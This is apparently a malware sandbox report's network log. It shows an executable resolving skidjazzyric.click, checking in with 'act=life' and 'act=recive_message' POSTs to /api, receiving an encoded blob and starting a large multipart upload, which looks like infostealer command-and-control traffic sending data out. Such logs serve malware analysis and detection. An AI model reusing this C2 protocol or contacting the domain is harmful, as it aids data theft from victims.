                                                                      Jan 9, 2025 08:43:37.411339998 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.411380053 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.411715031 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.411727905 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.411739111 CET49707443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.411744118 CET44349707104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.568056107 CET49708443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.568121910 CET44349708104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:37.568228960 CET49708443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.568556070 CET49708443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:37.568567991 CET44349708104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:38.043437004 CET44349708104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:38.043715954 CET49708443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:38.044951916 CET49708443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:38.044982910 CET44349708104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:38.045241117 CET44349708104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:38.046425104 CET49708443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:38.046588898 CET49708443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:38.046624899 CET44349708104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:38.622700930 CET44349708104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:38.622801065 CET44349708104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:38.622859955 CET49708443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:38.623074055 CET49708443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:38.623099089 CET44349708104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:38.726619005 CET49709443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:38.726675034 CET44349709104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:38.726767063 CET49709443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:38.727055073 CET49709443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:38.727065086 CET44349709104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:39.209408998 CET44349709104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:39.209527969 CET49709443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:39.504125118 CET49709443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:39.504156113 CET44349709104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:39.504488945 CET44349709104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:39.506520033 CET49709443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:39.506730080 CET49709443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:39.506758928 CET44349709104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:39.506812096 CET49709443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:39.506818056 CET44349709104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:40.002528906 CET44349709104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:40.002635956 CET44349709104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:40.002731085 CET49709443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:40.002942085 CET49709443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:40.002959967 CET44349709104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:40.282191992 CET49710443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:40.282262087 CET44349710104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:40.282360077 CET49710443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:40.282725096 CET49710443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:40.282743931 CET44349710104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:40.747092962 CET44349710104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:40.747262955 CET49710443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:40.748456955 CET49710443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:40.748471975 CET44349710104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:40.748713970 CET44349710104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:40.750006914 CET49710443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:40.750160933 CET49710443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:40.750193119 CET44349710104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:40.750264883 CET49710443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:40.750277996 CET44349710104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:41.383359909 CET44349710104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:41.383455038 CET44349710104.21.96.1192.168.2.8
                                                                      Jan 9, 2025 08:43:41.383510113 CET49710443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:41.384829044 CET49710443192.168.2.8104.21.96.1
                                                                      Jan 9, 2025 08:43:41.384851933 CET44349710104.21.96.1192.168.2.8
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Jan 9, 2025 08:43:35.059890032 CET5501153192.168.2.81.1.1.1
                                                                      Jan 9, 2025 08:43:35.072725058 CET53550111.1.1.1192.168.2.8
                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      Jan 9, 2025 08:43:35.059890032 CET192.168.2.81.1.1.10xc863Standard query (0)skidjazzyric.clickA (IP address)IN (0x0001)false
                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      Jan 9, 2025 08:43:35.072725058 CET1.1.1.1192.168.2.80xc863No error (0)skidjazzyric.click104.21.96.1A (IP address)IN (0x0001)false
                                                                      Jan 9, 2025 08:43:35.072725058 CET1.1.1.1192.168.2.80xc863No error (0)skidjazzyric.click104.21.64.1A (IP address)IN (0x0001)false
                                                                      Jan 9, 2025 08:43:35.072725058 CET1.1.1.1192.168.2.80xc863No error (0)skidjazzyric.click104.21.32.1A (IP address)IN (0x0001)false
                                                                      Jan 9, 2025 08:43:35.072725058 CET1.1.1.1192.168.2.80xc863No error (0)skidjazzyric.click104.21.80.1A (IP address)IN (0x0001)false
                                                                      Jan 9, 2025 08:43:35.072725058 CET1.1.1.1192.168.2.80xc863No error (0)skidjazzyric.click104.21.48.1A (IP address)IN (0x0001)false
                                                                      Jan 9, 2025 08:43:35.072725058 CET1.1.1.1192.168.2.80xc863No error (0)skidjazzyric.click104.21.112.1A (IP address)IN (0x0001)false
                                                                      Jan 9, 2025 08:43:35.072725058 CET1.1.1.1192.168.2.80xc863No error (0)skidjazzyric.click104.21.16.1A (IP address)IN (0x0001)false
                                                                      • skidjazzyric.click
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.849706104.21.96.14432960C:\Users\user\Desktop\uU6IvUPN39.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-09 07:43:35 UTC265OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 8
                                                                      Host: skidjazzyric.click
                                                                      2025-01-09 07:43:35 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                      Data Ascii: act=life
                                                                      2025-01-09 07:43:36 UTC1127INHTTP/1.1 200 OK
                                                                      Date: Thu, 09 Jan 2025 07:43:35 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=qt3eu9shu8nnfgbju12sb5d3cu; expires=Mon, 05 May 2025 01:30:14 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3hB2HY0BnpDQUHzo68Yfe2wlYIpn2bGLBI%2F0hvShUlelafeXwGNePI6nxvas1ieBNJOQoyqFHodsB82TGsuWuOH9QaL2QLriLPrniS%2FcBNIJWeanRfODITd67WZrL6o9m%2FYBT24%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ff2cc17fff872a4-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1951&min_rtt=1945&rtt_var=743&sent=8&recv=8&lost=0&retrans=0&sent_bytes=3058&recv_bytes=909&delivery_rate=2190000&cwnd=213&unsent_bytes=0&cid=74ce18b5f86b7617&ts=470&x=0"
                                                                      2025-01-09 07:43:36 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                      Data Ascii: 2ok
                                                                      2025-01-09 07:43:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                      Data Ascii: 0


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.849707104.21.96.14432960C:\Users\user\Desktop\uU6IvUPN39.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-09 07:43:36 UTC266OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: application/x-www-form-urlencoded
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 74
                                                                      Host: skidjazzyric.click
                                                                      2025-01-09 07:43:36 UTC74OUTData Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 34 68 35 56 66 48 2d 2d 26 6a 3d 31 34 34 38 62 62 36 32 65 31 32 37 36 38 32 31 64 35 30 32 34 36 65 62 38 38 62 33 31 30 39 66
                                                                      Data Ascii: act=recive_message&ver=4.0&lid=4h5VfH--&j=1448bb62e1276821d50246eb88b3109f
                                                                      2025-01-09 07:43:37 UTC1125INHTTP/1.1 200 OK
                                                                      Date: Thu, 09 Jan 2025 07:43:37 GMT
                                                                      Content-Type: text/html; charset=UTF-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Set-Cookie: PHPSESSID=11tss4j14pc5jsled9uekuhtte; expires=Mon, 05 May 2025 01:30:15 GMT; Max-Age=9999999; path=/
                                                                      Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                      Cache-Control: no-store, no-cache, must-revalidate
                                                                      Pragma: no-cache
                                                                      X-Frame-Options: DENY
                                                                      X-Content-Type-Options: nosniff
                                                                      X-XSS-Protection: 1; mode=block
                                                                      cf-cache-status: DYNAMIC
                                                                      vary: accept-encoding
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBvm0zWQ4n1uo5bmIUp5VFNkSqBZOgNpTkkgGjO0u6UHy4%2BR1HirR3YchdJZBumayjUoaFRHF9iTsQYS2a4HCZWFI9HIiT%2BChklnZ4ogIFNhX7Uk4GIsCqnkoUAQDtlqN5TCZ4M%3D"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 8ff2cc1e0a2c4363-EWR
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1549&min_rtt=1545&rtt_var=589&sent=7&recv=8&lost=0&retrans=0&sent_bytes=3057&recv_bytes=976&delivery_rate=2766898&cwnd=241&unsent_bytes=0&cid=4815b0303ab9bed5&ts=763&x=0"
                                                                      2025-01-09 07:43:37 UTC244INData Raw: 31 34 38 37 0d 0a 2b 57 4d 62 41 5a 57 54 6c 37 46 2f 52 54 61 38 73 53 78 6c 63 43 79 74 67 6d 72 6a 50 48 76 78 70 4b 62 47 6c 75 67 48 4a 67 53 43 51 57 30 6a 72 36 65 37 6b 77 77 67 46 49 62 46 58 68 41 56 41 49 2f 6a 44 73 45 47 48 5a 44 49 31 61 4f 36 79 6e 46 4c 4a 73 4d 46 65 6d 33 6d 39 72 75 54 47 6a 30 55 68 75 70 58 52 78 56 43 6a 37 68 49 68 6c 59 5a 6b 4d 6a 45 70 2f 32 48 64 30 70 6e 6b 51 39 38 61 66 44 77 38 39 41 54 4b 46 50 5a 31 45 30 50 48 6b 58 41 36 67 66 42 45 46 6d 55 33 6f 54 38 74 4b 56 69 55 6d 57 30 41 6d 68 71 74 2b 36 37 79 6c 30 67 57 4a 36 4c 44 67 51 56 54 73 48 6b 44 6f 68 55 45 35 6e 41 78 61 4c 38 6d 47 35 41 62 4a 45 42 66 32 6a 36 2b 65 66 64 47 53 39 59 33 39 35 4e 52 31 77 4f 79 50
                                                                      Data Ascii: 1487+WMbAZWTl7F/RTa8sSxlcCytgmrjPHvxpKbGlugHJgSCQW0jr6e7kwwgFIbFXhAVAI/jDsEGHZDI1aO6ynFLJsMFem3m9ruTGj0UhupXRxVCj7hIhlYZkMjEp/2Hd0pnkQ98afDw89ATKFPZ1E0PHkXA6gfBEFmU3oT8tKViUmW0Amhqt+67yl0gWJ6LDgQVTsHkDohUE5nAxaL8mG5AbJEBf2j6+efdGS9Y395NR1wOyP
                                                                      2025-01-09 07:43:37 UTC1369INData Raw: 68 49 32 52 35 4b 6f 63 58 56 74 65 47 48 64 55 49 6d 68 45 39 67 49 2f 44 39 74 59 74 64 4c 31 6a 51 31 6b 30 49 46 55 2f 50 38 67 65 42 58 52 47 62 77 73 36 72 2b 34 56 72 54 6d 47 54 43 48 35 73 38 50 6e 7a 33 42 35 6e 47 70 37 55 56 6b 64 4b 44 75 2f 77 43 34 4a 4b 46 49 4b 47 32 2b 72 74 79 6d 4a 49 4a 73 4e 42 66 32 33 32 2f 50 58 42 46 53 78 66 32 38 46 46 44 68 39 44 7a 2b 30 43 6a 6c 30 5a 6c 4d 7a 4f 71 2f 36 4f 61 45 6c 67 6d 77 45 35 4c 62 66 32 37 5a 4e 46 5a 33 66 62 77 30 6b 4c 42 41 7a 31 6f 42 66 50 52 31 6d 55 79 6f 54 38 74 49 4a 67 52 32 57 51 44 6e 70 72 2f 4f 50 31 77 52 73 71 55 63 7a 56 53 77 6b 59 54 64 33 71 42 6f 64 64 45 4a 6a 50 77 61 50 77 79 69 73 45 59 59 4e 42 49 53 50 57 2f 50 37 66 46 7a 42 55 6e 73 77 41 48 6c 4a 4a 77
                                                                      Data Ascii: hI2R5KocXVteGHdUImhE9gI/D9tYtdL1jQ1k0IFU/P8geBXRGbws6r+4VrTmGTCH5s8Pnz3B5nGp7UVkdKDu/wC4JKFIKG2+rtymJIJsNBf232/PXBFSxf28FFDh9Dz+0Cjl0ZlMzOq/6OaElgmwE5Lbf27ZNFZ3fbw0kLBAz1oBfPR1mUyoT8tIJgR2WQDnpr/OP1wRsqUczVSwkYTd3qBoddEJjPwaPwyisEYYNBISPW/P7fFzBUnswAHlJJw
                                                                      2025-01-09 07:43:37 UTC1369INData Raw: 52 46 4a 2b 47 69 75 54 7a 6b 69 55 63 4a 72 45 43 62 57 44 39 73 38 44 51 45 79 6c 54 79 4a 4e 52 53 51 73 4f 79 4f 78 49 32 52 34 55 6b 73 37 43 74 76 75 48 5a 6b 70 6f 6c 41 52 32 61 2f 66 78 2b 4e 59 5a 4c 46 2f 64 33 6b 6f 56 47 45 37 48 35 51 6d 4c 56 46 6e 64 68 73 4f 38 74 4e 49 6c 64 58 47 51 51 30 78 67 2b 66 2f 79 78 56 30 34 47 73 65 54 53 51 74 53 46 6f 2f 74 41 49 52 62 46 70 4c 4d 79 71 48 2b 68 6d 31 4b 5a 59 6b 4f 66 57 50 37 2b 66 2f 65 45 79 4e 63 31 39 68 46 41 52 4a 50 78 61 42 47 77 56 6b 42 30 35 36 45 6b 50 4f 47 61 45 73 6b 72 67 4a 33 62 66 44 6e 74 63 78 54 50 68 54 5a 33 77 35 66 55 6b 4c 47 34 41 4f 4c 57 68 6d 55 79 38 47 6e 38 34 6c 6f 51 32 79 56 42 6e 31 76 2f 76 7a 7a 30 78 6f 6a 55 63 7a 57 52 77 73 65 44 6f 47 67 44 35
                                                                      Data Ascii: RFJ+GiuTzkiUcJrECbWD9s8DQEylTyJNRSQsOyOxI2R4Uks7CtvuHZkpolAR2a/fx+NYZLF/d3koVGE7H5QmLVFndhsO8tNIldXGQQ0xg+f/yxV04GseTSQtSFo/tAIRbFpLMyqH+hm1KZYkOfWP7+f/eEyNc19hFARJPxaBGwVkB056EkPOGaEskrgJ3bfDntcxTPhTZ3w5fUkLG4AOLWhmUy8Gn84loQ2yVBn1v/vzz0xojUczWRwseDoGgD5
                                                                      2025-01-09 07:43:37 UTC1369INData Raw: 68 73 4f 6f 74 4e 49 6c 54 57 2b 4a 44 33 64 71 2b 76 66 39 31 42 4d 71 58 39 6a 59 53 51 41 55 51 38 66 74 44 59 4a 66 48 5a 6e 55 78 36 2f 2b 68 32 38 45 4b 4e 73 47 59 53 4f 76 73 64 4c 66 4e 44 64 50 7a 4d 55 4f 47 46 78 58 6a 2b 63 45 77 51 5a 5a 6b 4d 6e 4e 71 2f 79 43 61 6b 74 69 6c 51 64 2f 62 76 4c 2b 2f 38 45 56 4b 56 6e 56 33 45 55 56 45 6b 50 4c 37 41 79 4a 56 52 50 54 69 49 53 6a 37 4d 6f 39 42 46 4f 57 44 6e 6c 67 34 62 48 71 6e 51 52 6e 55 39 4b 54 46 6b 63 65 51 4d 2f 76 42 49 31 56 45 5a 4c 4b 79 71 50 78 67 32 31 4d 64 4a 6f 46 63 57 4c 35 2f 76 54 58 47 43 4a 51 32 64 64 49 43 46 49 41 6a 2b 63 51 77 51 5a 5a 76 4f 48 78 35 74 57 77 4a 56 73 6f 67 6b 46 2b 62 37 65 70 74 64 38 65 4b 31 7a 52 31 55 63 4c 47 45 66 45 37 41 4f 46 55 68 43
                                                                      Data Ascii: hsOotNIlTW+JD3dq+vf91BMqX9jYSQAUQ8ftDYJfHZnUx6/+h28EKNsGYSOvsdLfNDdPzMUOGFxXj+cEwQZZkMnNq/yCaktilQd/bvL+/8EVKVnV3EUVEkPL7AyJVRPTiISj7Mo9BFOWDnlg4bHqnQRnU9KTFkceQM/vBI1VEZLKyqPxg21MdJoFcWL5/vTXGCJQ2ddICFIAj+cQwQZZvOHx5tWwJVsogkF+b7eptd8eK1zR1UcLGEfE7AOFUhC
                                                                      2025-01-09 07:43:37 UTC912INData Raw: 66 57 4d 64 30 4e 76 69 51 39 30 62 50 2f 35 2f 4e 49 5a 49 6c 6e 59 33 30 51 47 46 55 44 42 36 45 6a 50 48 68 36 4c 68 70 7a 6b 31 5a 70 2b 56 6e 43 57 49 48 52 73 74 2b 36 37 79 6c 30 67 57 4a 36 4c 44 67 34 41 53 73 4c 79 41 59 5a 51 46 70 44 55 78 61 6e 2f 6d 47 4a 4c 59 70 77 4e 66 32 7a 78 38 50 44 5a 45 53 42 52 31 64 78 43 52 31 77 4f 79 50 68 49 32 52 34 33 6d 4e 58 54 70 2f 71 42 63 31 38 6d 68 45 39 67 49 2f 44 39 74 59 74 64 4a 46 2f 56 31 30 34 4c 45 6b 72 43 34 42 71 4f 57 52 36 61 7a 64 61 75 38 34 31 75 54 47 32 55 42 32 74 76 2b 65 50 77 77 51 39 6e 47 70 37 55 56 6b 64 4b 44 76 6e 6e 47 4a 46 64 57 36 4c 51 78 37 4c 2f 68 32 6b 45 65 64 55 59 4f 57 54 37 73 61 32 54 47 79 68 64 33 64 78 50 44 68 35 44 79 75 6b 4e 67 46 67 64 6d 63 7a 45
                                                                      Data Ascii: fWMd0NviQ90bP/5/NIZIlnY30QGFUDB6EjPHh6Lhpzk1Zp+VnCWIHRst+67yl0gWJ6LDg4ASsLyAYZQFpDUxan/mGJLYpwNf2zx8PDZESBR1dxCR1wOyPhI2R43mNXTp/qBc18mhE9gI/D9tYtdJF/V104LEkrC4BqOWR6azdau841uTG2UB2tv+ePwwQ9nGp7UVkdKDvnnGJFdW6LQx7L/h2kEedUYOWT7sa2TGyhd3dxPDh5DyukNgFgdmczE
                                                                      2025-01-09 07:43:37 UTC1369INData Raw: 33 38 30 39 0d 0a 79 2f 4e 41 61 4c 6c 4c 56 30 45 51 49 46 55 6a 4c 34 41 4f 47 55 42 2b 57 7a 63 33 6b 75 73 70 69 58 43 62 44 51 56 39 41 35 65 50 48 33 52 34 38 46 4d 47 64 56 30 63 56 51 6f 2b 34 53 49 70 57 46 6f 48 44 7a 61 7a 77 67 32 56 41 62 4a 59 47 65 57 62 36 39 50 48 64 47 53 42 55 30 74 78 4a 44 78 31 4b 7a 2b 39 49 7a 78 34 65 69 34 61 63 35 4e 53 42 63 32 56 6f 6b 42 4d 35 66 4c 6e 6f 74 64 51 52 5a 77 79 65 33 55 63 47 47 6b 44 44 36 41 79 54 58 68 4b 61 79 63 57 72 39 49 6c 6b 54 6d 36 4a 42 33 6c 6f 2f 2f 62 39 31 78 4d 31 56 64 47 54 41 45 63 56 56 6f 2b 34 53 4c 42 49 48 70 54 4a 68 6f 33 7a 6b 57 52 4f 5a 5a 41 4e 4f 58 79 35 36 4c 58 55 45 57 63 4d 6e 74 35 43 43 68 5a 63 77 2b 41 49 69 46 6b 54 67 63 6e 4c 71 66 65 4b 59 46 5a 6e
                                                                      Data Ascii: 3809y/NAaLlLV0EQIFUjL4AOGUB+Wzc3kuspiXCbDQV9A5ePH3R48FMGdV0cVQo+4SIpWFoHDzazwg2VAbJYGeWb69PHdGSBU0txJDx1Kz+9Izx4ei4ac5NSBc2VokBM5fLnotdQRZwye3UcGGkDD6AyTXhKaycWr9IlkTm6JB3lo//b91xM1VdGTAEcVVo+4SLBIHpTJho3zkWROZZANOXy56LXUEWcMnt5CChZcw+AIiFkTgcnLqfeKYFZn
                                                                      2025-01-09 07:43:37 UTC1369INData Raw: 2f 32 39 76 4c 59 44 79 78 47 31 64 74 4e 43 52 70 48 7a 2b 34 49 67 46 4d 5a 30 34 69 45 6f 2b 7a 4b 50 51 52 44 75 42 5a 76 61 62 58 53 34 73 55 58 49 46 6a 49 32 45 38 45 42 45 50 66 6f 45 62 42 54 78 36 43 68 70 79 79 35 4a 31 69 57 79 69 43 51 58 35 76 74 36 6d 31 32 42 49 70 57 64 58 58 52 77 49 61 54 63 72 6c 41 6f 31 53 47 4a 76 50 7a 71 48 78 6a 47 39 48 61 4a 51 41 64 57 66 2b 2f 2f 79 54 55 32 64 54 78 70 4d 57 52 79 52 65 79 50 67 46 6b 52 77 72 6b 4e 66 56 73 66 6d 61 59 77 5a 4a 6d 41 31 36 5a 76 44 68 74 63 78 54 50 68 54 5a 33 77 35 66 55 6b 37 4c 37 41 75 47 55 42 61 65 79 63 4f 76 2b 34 42 72 56 6d 6d 65 43 58 56 72 2b 75 50 2f 32 51 38 75 58 64 50 64 52 68 55 52 44 6f 47 67 44 35 6b 65 51 64 50 30 7a 71 66 34 6e 47 68 4c 4a 6f 52 50 59
                                                                      Data Ascii: /29vLYDyxG1dtNCRpHz+4IgFMZ04iEo+zKPQRDuBZvabXS4sUXIFjI2E8EBEPfoEbBTx6Chpyy5J1iWyiCQX5vt6m12BIpWdXXRwIaTcrlAo1SGJvPzqHxjG9HaJQAdWf+//yTU2dTxpMWRyReyPgFkRwrkNfVsfmaYwZJmA16ZvDhtcxTPhTZ3w5fUk7L7AuGUBaeycOv+4BrVmmeCXVr+uP/2Q8uXdPdRhURDoGgD5keQdP0zqf4nGhLJoRPY
                                                                      2025-01-09 07:43:37 UTC1369INData Raw: 32 33 52 4d 67 51 73 2b 54 41 45 63 64 44 70 66 5a 53 4d 6b 65 4a 74 32 47 33 4f 53 73 79 6c 42 48 61 4a 55 47 62 33 4b 36 30 66 37 46 48 43 70 66 30 70 46 50 43 67 4a 4a 6a 36 35 49 68 78 35 42 77 34 69 45 6f 4f 58 4b 50 52 51 30 77 46 51 71 4e 4b 65 6a 36 70 30 45 5a 30 4b 65 69 78 78 4a 55 6c 79 50 75 45 6a 47 58 51 75 42 77 4d 65 79 39 38 31 62 65 6b 61 51 44 58 70 76 39 76 61 31 6e 56 30 6f 46 49 62 71 44 67 51 41 58 49 44 78 48 6f 78 4f 48 74 2f 4f 31 61 6e 34 79 69 73 45 4b 70 38 4b 64 57 62 77 34 62 72 42 44 53 78 59 79 4a 39 4b 46 56 49 41 6a 2f 45 44 6a 6b 77 58 6c 49 6e 56 73 76 6d 61 5a 6b 46 68 31 77 6c 6f 62 76 75 78 75 35 4d 49 4c 46 6a 59 33 6c 74 49 41 31 6a 4d 39 67 2f 4e 56 67 69 65 79 6f 53 62 75 73 70 39 42 44 37 62 4e 48 70 74 2b 66
                                                                      Data Ascii: 23RMgQs+TAEcdDpfZSMkeJt2G3OSsylBHaJUGb3K60f7FHCpf0pFPCgJJj65Ihx5Bw4iEoOXKPRQ0wFQqNKej6p0EZ0KeixxJUlyPuEjGXQuBwMey981bekaQDXpv9va1nV0oFIbqDgQAXIDxHoxOHt/O1an4yisEKp8KdWbw4brBDSxYyJ9KFVIAj/EDjkwXlInVsvmaZkFh1wlobvuxu5MILFjY3ltIA1jM9g/NVgieyoSbusp9BD7bNHpt+f
                                                                      2025-01-09 07:43:37 UTC1369INData Raw: 41 56 66 5a 31 55 30 4a 42 56 2b 50 72 6b 69 48 48 6b 48 42 69 49 53 67 35 63 6f 39 46 44 54 41 56 43 6f 30 70 36 50 71 6e 51 52 6e 51 70 36 4c 48 55 6c 53 58 49 2b 34 53 4d 5a 51 46 4a 4c 46 79 71 66 6d 6d 47 4e 48 63 4a 68 47 52 31 33 53 2f 50 6a 57 45 79 42 71 34 50 4a 45 46 78 39 42 79 4e 34 32 74 6b 38 65 67 34 54 69 70 2b 4b 4a 4a 51 6f 6d 67 30 45 68 49 39 62 37 35 64 34 53 49 42 53 51 6b 30 70 48 53 67 37 71 37 51 57 45 55 42 37 52 35 38 36 30 2b 59 56 69 42 43 6a 62 44 54 6b 37 74 2f 44 2f 77 78 41 6f 55 35 4c 55 56 41 42 53 41 49 2f 75 53 4e 6b 65 47 4a 6e 57 79 61 76 7a 78 6d 4e 4b 61 4e 73 65 4e 33 71 33 35 37 57 4c 54 6d 6b 55 7a 4a 4d 57 52 31 56 41 77 75 45 4c 6a 31 30 4c 67 63 44 48 73 76 66 4e 57 33 70 44 6c 67 78 38 62 66 44 50 79 2f 49
                                                                      Data Ascii: AVfZ1U0JBV+PrkiHHkHBiISg5co9FDTAVCo0p6PqnQRnQp6LHUlSXI+4SMZQFJLFyqfmmGNHcJhGR13S/PjWEyBq4PJEFx9ByN42tk8eg4Tip+KJJQomg0EhI9b75d4SIBSQk0pHSg7q7QWEUB7R5860+YViBCjbDTk7t/D/wxAoU5LUVABSAI/uSNkeGJnWyavzxmNKaNseN3q357WLTmkUzJMWR1VAwuELj10LgcDHsvfNW3pDlgx8bfDPy/I


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      2192.168.2.849708104.21.96.14432960C:\Users\user\Desktop\uU6IvUPN39.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2025-01-09 07:43:38 UTC284OUTPOST /api HTTP/1.1
                                                                      Connection: Keep-Alive
                                                                      Content-Type: multipart/form-data; boundary=6CP9VWM5QP1IM68YUR
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                      Content-Length: 12841
                                                                      Host: skidjazzyric.click
